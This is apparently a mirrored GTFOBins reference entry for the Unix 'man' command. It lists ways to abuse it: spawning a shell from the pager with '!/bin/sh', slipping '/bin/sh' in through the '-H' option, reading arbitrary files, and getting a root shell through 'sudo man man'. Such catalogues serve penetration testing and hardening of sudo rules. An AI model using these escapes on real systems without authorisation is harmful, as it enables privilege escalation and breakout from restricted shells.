mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
18 lines
444 B
Markdown
18 lines
444 B
Markdown
---
|
|
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
man man
|
|
!/bin/sh
|
|
- description: This only works for GNU `man` and requires GNU `troff` (`groff` to be installed).
|
|
code: |
|
|
man '-H/bin/sh #' man
|
|
file-read:
|
|
- code: man file_to_read
|
|
sudo:
|
|
- code: |
|
|
sudo man man
|
|
!/bin/sh
|
|
---
|